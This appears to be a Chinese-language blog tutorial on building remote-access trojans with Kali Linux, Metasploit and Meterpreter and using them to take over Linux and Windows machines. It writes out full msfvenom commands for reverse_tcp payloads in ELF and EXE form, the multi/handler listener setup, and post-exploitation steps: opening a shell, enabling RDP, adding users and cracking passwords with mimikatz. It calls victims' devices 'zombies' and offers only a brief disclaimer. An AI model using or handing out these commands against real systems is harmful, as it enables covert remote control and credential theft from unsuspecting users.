聲明:禁止用作非法目的,謝絕一切形式的轉載。
當你在無意間點擊一個鏈接後,當你在不明情況安裝一個程序時,當你忍不住點擊一個美女圖片的時候,你的設備可能就此淪陷了,成爲了黑客眼中的"肉雞"。
文章目錄
kali Linux
Kali Linux是基於Debian的Linux發行版, 設計用於數字取證操作系統。由Offensive Security Ltd維護和資助。最先由Offensive Security的Mati Aharoni和Devon Kearns通過重寫BackTrack來完成,BackTrack是他們之前寫的用於取證的Linux發行版 。
Metersploit
Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描,社會工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。
Meterpreter
Meterpreter是 Metasploit 框架中的一個殺手鐗,通常作爲漏洞溢出後的攻擊使用, 攻擊觸發發漏洞後能夠返回給我們一個控制通道.
Linux攻擊
生成木馬
網絡上有好多生成木馬的方式,但是大多數都是相互copy,甚至有的還可能包含病毒,謹慎使用。網絡上下載的所有軟件都要慎用,除非是在官網上下載的。
生成一個使用於Lnux 64位系統的木馬,生成木馬的命令如下:
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test
LHOST 代表Listening host。LPORT代表Listening port。後續介紹網絡的時候會詳細講解。
翻譯一下這個命令:平臺Linux x64架構,使用payload是linux/x64/meterpreter/reverse_tcp,目標文件的格式是elf。可執行目標文件的名稱是test。
通過上面的命令,我們就就可以生成一個elf格式的test程序,當在遠端(也就是"肉雞")執行這個程序的時候,如果本地開啓了監聽,肉雞和本機之間就建立了一條通信的channel,通過這個木馬就能實現控制遠端的肉雞了,邪惡的微笑。
開啓監聽
- 開啓msf
msfconsole
- 加載模塊
msf5 > use exploit/multi/handler
- 設置payload
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
- 設置監聽ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
- 設置監聽port
msf5 exploit(multi/handler) > set LPORT 5555
- 執行
msf5 exploit(multi/handler) > exploit
攻擊效果
當執行完exploit之後,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進程等。
可以開啓一個shell,這樣基本等同於完全操控目標計算機了。
通過查看whoami可知正是當前登陸用戶的帳號。如何提升權限,後續會介紹。
Windows攻擊
生成木馬
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=4444 -i 3 -f exe -o payload_test.exe
具體含義可參考上文。
開啓監聽
- 開啓msf
msfconsole
- 加載模塊
msf5 > use exploit/multi/handler
- 設置payload
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
- 設置監聽ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
- 設置監聽port
msf5 exploit(multi/handler) > set LPORT 4444
- 執行
msf5 exploit(multi/handler) > exploit
攻擊效果
當執行完exploit之後,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進程等。同Linux。
查看那getuid是Administrator,管理員權限。在Windows下,這還不是最高的權限,最高的權限是system,至於如何提權,後續會講解。
開啓一個shell,發現有亂碼,這是由於Linux和Windows採用的編碼方式不一致導致的。可以通過chcp 65001
解決這個問題。
桌面截圖
開啓遠程桌面
通過以下命令開啓rdp服務
run post/windows/manager/enable_rdp
如圖:
添加用戶
帳號密碼破解
使用minikatz進行密碼破解
遠程桌面
通過rdestop 目標ip -u 賬戶
,可以實現遠程桌面的控制。
公衆號
瞭解更多網絡安全內容,歡迎關注我的公衆號:無情劍客